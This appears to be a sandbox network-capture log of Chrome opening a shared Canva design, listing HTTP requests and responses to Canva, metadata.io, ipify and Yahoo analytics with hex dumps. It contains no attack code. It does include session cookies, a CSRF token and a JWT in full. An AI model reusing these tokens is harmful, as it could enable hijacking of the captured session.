                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:55 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59516d48666a57-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                                    x-request-id: 8e59516d48666a57
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=68Dg1vNt2hMiQRTYDxabP4lZH%2F2f89%2B%2FD4N8hbI3zDoaoZRNinwvoBD4ZHqqCQiZ6ZI1tt2%2FWs%2BPEOReBttRElBH97ySCOVeTsoF8rU4STVBdupqAhmRZVpIZfGhhUc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC64INData Raw: 33 61 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 6e 6f 74 20 66 6f 75 6e 64 22 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 3a'"])}while(1);</x>//{"statusCode":404,"error":"not found"}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    128192.168.2.1249865104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC1492OUTGET /_ajax/csrf3/designinsight HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_cam [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC1050INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:55 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59516e5d2b78e7-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                                    x-request-id: 8e59516e5d2b78e7
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dtb%2FA28SgjASLrDC3gNy6R2ecey4SDI2Wzjm3kG%2FKGTEQtxcVkQOoV3IvU%2BGpc2vXb7EBez5K8vrJsfdOMPjlh5RPfG1Ypdw6NXiq4nMVvrCVXy0bHc7nvc7vMBs378%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC164INData Raw: 39 65 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 41 22 3a 22 50 43 45 30 4c 46 4b 4e 71 56 51 48 68 33 33 37 36 64 34 5f 52 6f 64 56 35 72 56 4d 37 71 41 4d 44 33 68 5f 45 4b 75 61 55 4f 5a 75 6a 33 36 53 33 64 47 66 32 4c 63 47 61 46 73 6a 69 66 4b 52 71 75 4f 76 43 79 42 59 32 69 4e 4c 38 78 49 4a 52 47 6b 54 53 54 6b 38 7a 6c 69 6f 66 49 41 63 64 4c 43 67 4e 66 4f 76 57 34 63 41 62 47 71 48 22 2c 22 42 22 3a 31 37 33 32 31 32 32 31 31 35 36 30 38 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 9e'"])}while(1);</x>//{"A":"PCE0LFKNqVQHh3376d4_RodV5rVM7qAMD3h_EKuaUOZuj36S3dGf2LcGaFsjifKRquOvCyBY2iNL8xIJRGkTSTk8zliofIAcdLCgNfOvW4cAbGqH","B":1732122115608}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    129192.168.2.1249864104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC2753OUTPOST /_ajax/designinsight/heartbeats HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Length: 94
                                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-App: design_viewer
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    X-Canva-Build-Sha: 4aaacc3
                                                                                                                                                                                                                                                                    X-Csrf-Token: rGqerD8sX1rCOMoka0_nZywB9S9y2_y5c4PGQ9eLEe5snd9QSZPiOVfQDicUUcpxsq8RgFuu66z0kWPDtNx-49kxplFGRxIQNInYQQj_o47msdy4
                                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-Analytics: AAMAA1dFQgA=
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                    X-Canva-Request: recordheartbeat
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241118-21
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC94OUTData Raw: 7b 22 42 22 3a 22 62 62 61 63 37 61 36 34 2d 66 64 33 65 2d 34 65 31 64 2d 39 64 39 64 2d 35 35 61 31 35 36 31 63 33 31 64 66 22 2c 22 43 22 3a 22 44 41 47 58 42 51 66 51 33 41 4d 22 2c 22 44 22 3a 22 68 35 64 31 31 37 30 36 66 36 31 22 2c 22 45 22 3a 31 2c 22 47 22 3a 22 43 22 7d
                                                                                                                                                                                                                                                                    Data Ascii: {"B":"bbac7a64-fd3e-4e1d-9d9d-55a1561c31df","C":"DAGXBQfQ3AM","D":"h5d11706f61","E":1,"G":"C"}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC1063INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:55 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59516def7dc413-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                                    x-request-id: 8e59516def7dc413
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eRNZ%2B%2BhPqBnOwad93wUKzZ1PmdNzT10kt2pr5VhWE6Bkap2m1%2FZsCL3RZeJ7xkyk6GLtZl16M2ogqAifPszunS6rkXK7DTvqN6UJ6F9oejuNW7pR36I361w1RcTSerY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC28INData Raw: 31 36 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 16'"])}while(1);</x>//{}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    130192.168.2.124986618.161.111.33443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC561OUTGET /pixel/config/1721.json HTTP/1.1
                                                                                                                                                                                                                                                                    Host: cdn.metadata.io
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC810INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                    Content-Length: 354
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                    Last-Modified: Mon, 22 Jul 2024 02:40:56 GMT
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: M9mCnq1eLFymQr3gKnRqRiqpIYrp9XbS
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:55 GMT
                                                                                                                                                                                                                                                                    ETag: "b4f9f0dd587c5abe6708f44a6e11a53f"
                                                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                    Via: 1.1 05320c9e938aca851d2d618f965d8882.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: MRS52-P4
                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: 880zmMRRFYAZHxu7ZcHKVPKhd-7CjvbZCdtH2YitxmuuwXfdgT6_qA==
                                                                                                                                                                                                                                                                    Age: 1060
                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC354INData Raw: 7b 22 70 69 78 65 6c 4a 77 74 22 3a 20 22 65 79 4a 30 65 58 41 69 4f 69 4a 4b 56 31 51 69 4c 43 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 4a 39 2e 65 79 4a 7a 64 57 49 69 4f 69 4a 77 61 58 68 6c 62 43 42 6a 62 32 35 6d 61 57 63 69 4c 43 4a 75 59 57 31 6c 49 6a 6f 69 51 32 46 75 64 6d 45 67 53 57 35 6a 4c 69 49 73 49 6d 6c 7a 63 79 49 36 49 6d 31 6c 64 47 46 6b 59 58 52 68 49 47 6c 75 59 79 34 69 4c 43 4a 68 64 57 51 69 4f 69 49 78 4e 7a 49 78 49 69 77 69 5a 58 68 77 49 6a 6f 78 4e 7a 59 33 4d 54 45 35 4e 44 41 77 4c 43 4a 70 59 58 51 69 4f 6a 45 33 4d 6a 45 78 4d 7a 63 78 4d 44 59 73 49 6d 35 69 5a 69 49 36 4d 54 63 78 4f 54 63 33 4d 6a 49 77 4d 43 77 69 59 32 39 73 62 47 56 6a 64 45 6c 75 63 32 6c 6e 61 48 52 7a 49 6a 6f 77 4c 43 4a 77 59 57 4e 72
                                                                                                                                                                                                                                                                    Data Ascii: {"pixelJwt": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJwaXhlbCBjb25maWciLCJuYW1lIjoiQ2FudmEgSW5jLiIsImlzcyI6Im1ldGFkYXRhIGluYy4iLCJhdWQiOiIxNzIxIiwiZXhwIjoxNzY3MTE5NDAwLCJpYXQiOjE3MjExMzcxMDYsIm5iZiI6MTcxOTc3MjIwMCwiY29sbGVjdEluc2lnaHRzIjowLCJwYWNr


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    131192.168.2.1249867104.26.12.205443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC549OUTGET /?format=json HTTP/1.1
                                                                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC438INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:55 GMT
                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                    Content-Length: 20
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e5951702a317cb1-EWR
                                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1979&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1127&delivery_rate=1383886&cwnd=235&unsent_bytes=0&cid=a538606239c8bd49&ts=494&x=0"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC20INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d
                                                                                                                                                                                                                                                                    Data Ascii: {"ip":"8.46.123.75"}


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    132192.168.2.124986954.171.122.26443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC497OUTGET /spp.pl?a=10000&.yp=10137834&gtmcb=1918978199 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: sp.analytics.yahoo.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: A3=d=AQABBOH5PWcCENgT-oowxfORKcicBnQezVEFEgEBAQFLP2dHZ9xS0iMA_eMAAA&S=AQAAAm5IQOCq3-jGxsQ7TpQZtUQ
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC948INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:56 GMT
                                                                                                                                                                                                                                                                    Expires: Wed, 20 Nov 2024 15:01:56 GMT
                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, private, must-revalidate
                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                                    Server: ATS/9.1.10.144
                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Via: http/1.1 traffic_server (ApacheTrafficServer/9.1.10.144)
                                                                                                                                                                                                                                                                    Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    Content-Security-Policy: sandbox; default-src 'self'; script-src 'none'; object-src 'none'; report-uri http://csp.yahoo.com/beacon/csp?src=generic
                                                                                                                                                                                                                                                                    Set-Cookie: A3=d=AQABBOH5PWcCENgT-oowxfORKcicBnQezVEFEgEBAQFLP2dHZ9xS0iMA_eMAAA&S=AQAAAm5IQOCq3-jGxsQ7TpQZtUQ; Expires=Thu, 20 Nov 2025 21:01:56 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff ff ff ff 21 f9 04 04 14 00 ff 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    133192.168.2.124986818.161.111.63443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC355OUTGET /site-insights.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: cdn.metadata.io
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC765INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                    Content-Length: 6785
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 19 Jun 2024 15:02:09 GMT
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: GL5Tx2BZR8maW_iFgMB1W5mptWqV16dc
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 08:21:03 GMT
                                                                                                                                                                                                                                                                    ETag: "9c747cf07b2623fe6f77e47f5a134103"
                                                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                    Via: 1.1 143caa1c9abcde97dbb70de4ddf45882.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: MRS52-P4
